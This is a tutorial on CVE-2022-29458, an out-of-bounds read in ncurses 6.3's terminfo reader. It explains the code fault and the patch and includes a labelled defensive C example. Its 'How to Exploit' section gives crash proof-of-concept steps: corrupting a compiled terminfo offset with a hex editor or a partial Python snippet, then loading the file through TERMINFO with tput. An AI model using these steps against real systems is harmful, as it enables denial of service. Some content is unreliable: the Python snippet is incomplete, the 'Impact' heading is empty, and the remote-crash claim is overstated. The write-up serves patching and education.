ncurses is the backbone for text-based user interfaces in Unix-like systems. But even popular libraries can have critical bugs. In 2022, a serious vulnerability (CVE-2022-29458) was found in ncurses 6.3, specifically in its terminfo library. This bug can cause out-of-bounds memory reads and crashes, opening doors for denial-of-service attacks — and, in some cases, information leaks or even code execution.
This tutorial explains CVE-2022-29458 in plain language, dives into the affected code, and demonstrates exploitation with simple examples. If you’re a developer, sysadmin, or security researcher, keep reading. Patching this bug is crucial!
## What is CVE-2022-29458?
Short answer:
It's an out-of-bounds read (which can turn into a segmentation fault) caused by mishandling string tables inside the convert_strings function in ncurses’s terminfo reader.
Affected software:
- ncurses 6.3 and earlier (before patch 20220416)
- Library file: tinfo/read_entry.c
Impact:
## Why Does This Happen?
The problem lies in the convert_strings function, which processes terminfo files. Terminfo files describe terminal capabilities with a set of string fields. When a terminfo file is malformed (i.e., string offsets point outside the actual string table), convert_strings did not properly check the boundaries. This can result in the function reading beyond the buffer, possibly crashing the process or leaking sensitive data.
Here’s the problematic section from ncurses-6.3/tinfo/read_entry.c (pre-patch):
```c
// Simplified code (before patch 20220416)
if (have_strings > 0) {
    strings = (char *)_nc_doalloc(0, str_count + 1 + 1);
    for (i = 0; i < str_count; i++) {
        if (str_table != 0
            && value[i] >= 0
            && (unsigned)value[i] < str_limit) {
            // Copy string from str_table+value[i]
            strcpy(strings + offsets[i], str_table + value[i]);
        }
    }
}
```
- For each entry, it uses value[i] as the offset into str_table.
- It checks that value[i] is non-negative and less than str_limit, but does not check if str_table + value[i] is within the actual buffer, nor if the string continues past the buffer end.
- Malicious data here can make str_table + value[i] point outside the buffer, triggering undefined behavior.
## How to Exploit CVE-2022-29458
This bug is exploited by crafting a malicious terminfo file with an incorrect string offset — one that points past the end of the string table.
malformed_terminfo.src:
```
myterm|My dangerous terminfo,
    cup=\E[%i%p1%d;%p2%dH,
```
Now, compile with tic but intentionally corrupt the offset by editing the binary:
```bash
tic malformed_terminfo.src
# Now use a hex editor to OVERWRITE the offset for cup beyond the actual string table
```
Alternatively, use Python to manipulate offsets:
```python
with open('malformed_terminfo', 'rb') as f:
    data = bytearray(f.read())
# Locate offset (check terminfo format documentation) and set it past length of string table
data[offset_location] = 0xFF  # way too high
with open('malformed_terminfo_bad', 'wb') as f:
    f.write(data)
```
Direct any ncurses app (like tput or even less) to use this terminfo file by setting the TERMINFO environment variable:
```bash
export TERMINFO=/path/to/malformed
tput cup 10 10
```
Expect a crash or a segmentation fault. The convert_strings function will read beyond the buffer, and in debug builds or with AddressSanitizer, you’ll see an out-of-bounds read.
## The Patch: What Changed?
Here’s the official patch:
```c
// New boundary checks before accessing offsets and string table
if ((unsigned)value[i] < str_limit
    && _nc_check_termtype(type, str_table + value[i])) {
    // ...
}
```
The patch ensures offsets are properly validated before being used, preventing reads outside the string table.
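To make the two checks discussed above (in the "Why Does This Happen?" section and in the patch description) concrete, here is an added example in C that is not ncurses code: `resolve_string` and `convert_strings_checked` are constructed names, and the 8-byte string table and four offsets are constructed sample data. It goes one step beyond the page's simplified snippet by also rejecting an offset that lands inside the table but whose string has no NUL before the table ends, which is exactly the case where a plain `strcpy` would read past the buffer.

```c
#include <stddef.h>
#include <string.h>

#define ABSENT_STRING ((const char *)0)

/* Constructed sample: an 8-byte string table whose second string
 * ("\033[2J") has no NUL terminator inside the table. */
static const char k_table[8] = {'\033', '[', 'H', '\0', '\033', '[', '2', 'J'};
/* Four 16-bit little-endian offsets, as the compiled terminfo stores them:
 * 0 (valid), 4 (unterminated), 0x0100 (past the end), 0xFFFF (absent). */
static const unsigned char k_offsets[8] = {0x00, 0x00, 0x04, 0x00,
                                           0x00, 0x01, 0xFF, 0xFF};

static unsigned read_offset(const unsigned char *offsets, int index)
{
    return offsets[2 * index] | ((unsigned)offsets[2 * index + 1] << 8);
}

/* Return a pointer into `table` only if `raw` lies inside it AND a NUL is
 * found before table + size; otherwise ABSENT_STRING. Both checks matter:
 * the second is what keeps strcpy()/strlen() from walking off the end. */
const char *resolve_string(const char *table, size_t size, unsigned raw)
{
    if (raw >= size)                          /* offset outside the table */
        return ABSENT_STRING;
    if (memchr(table + raw, '\0', size - raw) == NULL)
        return ABSENT_STRING;                 /* string never terminates */
    return table + raw;
}

/* Resolve every entry into `out`; returns how many were rejected as
 * malformed (the -1/-2 sentinels are legitimate and are not counted). */
int convert_strings_checked(const unsigned char *offsets, int count,
                            const char *table, size_t size, const char **out)
{
    int rejected = 0;
    for (int i = 0; i < count; i++) {
        unsigned raw = read_offset(offsets, i);
        if (raw == 0xFFFF || raw == 0xFFFE) { /* absent / cancelled */
            out[i] = ABSENT_STRING;
            continue;
        }
        out[i] = resolve_string(table, size, raw);
        if (out[i] == ABSENT_STRING)
            rejected++;
    }
    return rejected;
}
```

Run against the sample data, entry 0 resolves, entries 1 and 2 are rejected (unterminated and out of range), and entry 3 is treated as a legitimate absent capability.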
## Real-World Impact
- Denial of Service: Any tool that loads crafted terminfo entries can be crashed remotely or locally.
- Info leak: If sensitive data follows the string table in memory, some of it might be read out and exposed.
- Chained attacks: Combined with other vulnerabilities, this could lead to more serious security breaches.
Most users are vulnerable if untrusted terminfo files can be loaded (typically, either by compiling as your user or by admins via /usr/share/terminfo).
- Update to ncurses >= 6.3 patch 20220416:
```bash
sudo apt update && sudo apt upgrade # Ubuntu/Debian
sudo yum update # Fedora/CentOS/RHEL
```
- Avoid untrusted terminfo files: don't use or install terminal descriptions from unknown sources.
---
## Conclusion
CVE-2022-29458 is a simple yet dangerous bug living in a core library used by almost every terminal app on Unix-like systems. The lesson is clear: Always validate your inputs, even in “internal” formats like terminfo. Stay patched, and avoid using system files from untrusted sources!
*Share this post to raise awareness. If your project relies on ncurses (which, honestly, many do), double-check your library version and patch status today.*
## Timeline
Published on: 04/18/2022 21:15:00 UTC
Last modified on: 04/27/2022 13:14:00 UTC